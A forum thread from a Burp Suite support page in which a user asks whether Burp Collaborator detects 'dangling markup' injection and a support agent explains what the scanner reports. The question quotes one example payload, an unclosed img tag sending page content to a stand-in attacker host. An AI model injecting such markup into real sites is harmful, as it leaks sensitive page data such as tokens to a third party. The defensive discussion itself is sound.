Support Center

Burp Community

See what our users are saying about Burp Suite:

How do I?

New Post View All

Feature Requests

New Post View All

Burp Extensions

New Post View All

Bug Reports

New Post View All
Documentation

Burp Suite Documentation

Take a look at our Documentation section for full details about every Burp Suite tool, function and configuration option.

Full Documentation Contents Burp Projects
Suite Functions Burp Tools
Options Using Burp Suite
Extensibility

Burp Extender

Burp Extender lets you extend the functionality of Burp Suite in numerous ways.

Extensions can be written in Java, Python or Ruby.

API documentation Writing your first Burp Suite extension
Sample extensions View community discussions about Extensibility
Name is required.
Email address is required.
Invalid email address
Answer is required.
Exceeding max length of 5KB

Does Burp Collaborator test for "dangling markup" vulnerabilities?

Tim (MNIT) McGuire Apr 03, 2017 10:55PM UTC

This article on github (https://githubengineering.com/githubs-post-csp-journey/?utm_source=webopsweekly&utm_medium=email )

outlines an attack where an attacker injects an unclosed img tag
<img src='https://some-evil-site.com/log_csrf?html=

which then includes everything until the matching quote in a request to some-evil-site, potentially sending sensitive data.

Question, does burp collaborator find issues like this?

Thanks


Dafydd Stuttard Apr 06, 2017 10:53AM UTC Support Center agent

In this situation, Burp Scanner checks for various XSS-style injection vectors, including image tags, and will report these to the user.

It doesn’t attempt to actively exploit the issue to exfiltrate data via Burp Collaborator. You could do this easily enough with the manual Burp Collaborator client and your own payloads.


Post Your public answer

Your name
Your email address
Answer